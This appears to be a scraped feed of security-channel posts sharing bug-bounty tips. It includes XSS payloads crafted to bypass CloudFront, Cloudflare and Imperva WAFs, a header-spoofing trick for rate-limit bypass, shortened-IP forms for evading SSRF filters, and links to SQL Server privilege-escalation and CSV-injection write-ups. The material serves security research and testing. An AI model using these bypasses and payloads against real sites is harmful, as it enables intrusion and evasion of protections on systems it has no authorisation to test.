DbgShell - A PowerShell Front-End For The Windows Debugger Engine http://bit.ly/2O7c30o #infosec #hacking #hackers #pentesting #pentest #programming #opensource #powershell #Windows
CloudFront ~`XSS´ payload, shake dice.
🎲
<iframe srcdoc=<svg/onload=alert(1)>>
#BugBounty #BugBountyTip #WAF #infosec
🎲
<iframe srcdoc=<svg/onload=alert(1)>>
#BugBounty #BugBountyTip #WAF #infosec
Forwarded from امنیت اطلاعات
cloudflare «XSS» payload to bypass protection.
🦍
{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}
#BugBounty #BugBountyTip #WAF #infosec
@sec_nerd
🦍
{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}
#BugBounty #BugBountyTip #WAF #infosec
@sec_nerd
How I hacked 92k+ users Information using open s3 bucket
https://link.medium.com/R4um5AuO21
#bugbounty #infosec #SRT #security #Databreach #Synack #hackerone #bugcrowd #whitehat #hacked #securityengineer #databreach
https://link.medium.com/R4um5AuO21
#bugbounty #infosec #SRT #security #Databreach #Synack #hackerone #bugcrowd #whitehat #hacked #securityengineer #databreach
Medium
How I hacked 92k users Information using open s3 bucket
First of all this is my biggest hack I did in my life.The website I found few day ago while I am looking for bus ticket.After booking Bus…
Hacking SQL Server Stored Procedures
1: (un)Trustworthy Databases
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/
2: User Impersonation
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/
3: SQL Injection
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
4: Enumerating Domain Accounts
https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/
#infosec #pentest #redteam
1: (un)Trustworthy Databases
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/
2: User Impersonation
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/
3: SQL Injection
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
4: Enumerating Domain Accounts
https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/
#infosec #pentest #redteam
NetSPI
Hacking SQL Server Stored Procedures – Part 1: (un)Trustworthy Databases
In this blog I’ll show how database users commonly created for web applications can be used to escalate privileges in SQL Server when database ownership is poorly configured.
CSV Injection: http://ghostlulz.com/csv-injection/
ClickJacking: http://ghostlulz.com/clickjacking/
Exposed Firebase DB: http://ghostlulz.com/google-exposed-firebase-database/
Config Files: http://ghostlulz.com/exposed-log-and-configuration-files/
Kubernetes API : http://ghostlulz.com/exposed-kubernetes-api/
#bugbounty #bugbountytips #bugbountytip #redteam #pentest #infosec #xss
ClickJacking: http://ghostlulz.com/clickjacking/
Exposed Firebase DB: http://ghostlulz.com/google-exposed-firebase-database/
Config Files: http://ghostlulz.com/exposed-log-and-configuration-files/
Kubernetes API : http://ghostlulz.com/exposed-kubernetes-api/
#bugbounty #bugbountytips #bugbountytip #redteam #pentest #infosec #xss
Ghostlulz
CSV Injection - Ghostlulz
How to use CSV injection AKA Formula injection to embed a malicous payload into to spread sheet.
Rate limit bypass:
Add header/s with request
X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwared-Host: IP
If bypass successful, & after a while blocking request again. Increment the last octate
#infosec #bugbounty
Add header/s with request
X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwared-Host: IP
If bypass successful, & after a while blocking request again. Increment the last octate
#infosec #bugbounty
Bugbounty tips#3
Short IP addrs by dropping zeroes. To bypasses WAF filters for SSRF, open-redirect, whr any IP got blocked
Exmpls:
http://1.0.0.1 → http://1.1
http://192.168.0.1 → http://192.168.1
#infosec #SSRF #bugbountytip #bypass #WAF #bugbountytips #hackerone #hackers
Short IP addrs by dropping zeroes. To bypasses WAF filters for SSRF, open-redirect, whr any IP got blocked
Exmpls:
http://1.0.0.1 → http://1.1
http://192.168.0.1 → http://192.168.1
#infosec #SSRF #bugbountytip #bypass #WAF #bugbountytips #hackerone #hackers
please note and share;
blocked:
onauxclick=confirm(2)
bypassed:
onauxclick=[2].some(confirm)
#XSS #WAF #WAFBypass #bugbountytips #security #infosec #hacking
blocked:
onauxclick=confirm(2)
bypassed:
onauxclick=[2].some(confirm)
#XSS #WAF #WAFBypass #bugbountytips #security #infosec #hacking
Imperva WAF Bypass for XSS;
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">
- without parentheses, 'alert', 'document.domain' , 'window' , space
#BugBounty #BugBountyTip #WAF #infosec
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">
- without parentheses, 'alert', 'document.domain' , 'window' , space
#BugBounty #BugBountyTip #WAF #infosec
Grep hostnames from ssl certificate
echo | openssl s_client -connect example\.com | openssl x509 -noout -text | grep DNS
#infosec #pentest #bugbounty
echo | openssl s_client -connect example\.com | openssl x509 -noout -text | grep DNS
#infosec #pentest #bugbounty